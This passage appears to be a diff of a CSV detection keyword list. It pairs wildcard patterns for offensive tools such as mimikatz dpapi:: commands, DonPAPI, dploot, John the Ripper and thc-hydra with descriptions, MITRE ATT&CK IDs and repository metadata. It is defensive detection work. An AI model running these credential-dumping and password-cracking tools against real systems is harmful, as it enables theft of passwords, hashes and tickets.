tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::ssh*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::tpm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::vault*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::wifi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::wwman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*dpapi_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*dpapi_pick/credhist.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*DPAPImk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*dpl4hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*dpl4hydra.sh*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*dpl4hydra_*.csv*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*dpl4hydra_*.tmp*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*dpl4hydra_linksys*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpapi::blob*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::chrome*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cloudapkd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cloudapreg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::create*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::credhist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::luna*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::masterkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::protect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::ps*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::rdg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::ssh*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::tpm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::vault*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::wifi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi::wwman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*dpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*dpapi_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*dpapi_pick/credhist.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*DPAPImk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*dpl4hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra.sh*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_*.csv*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_*.tmp*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*dpl4hydra_linksys*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*dploot -*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" "*dploot*backupkey*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" "*dploot*browser*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" @@ -9623,20 +9771,20 @@ "*DReverseProxy.git*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 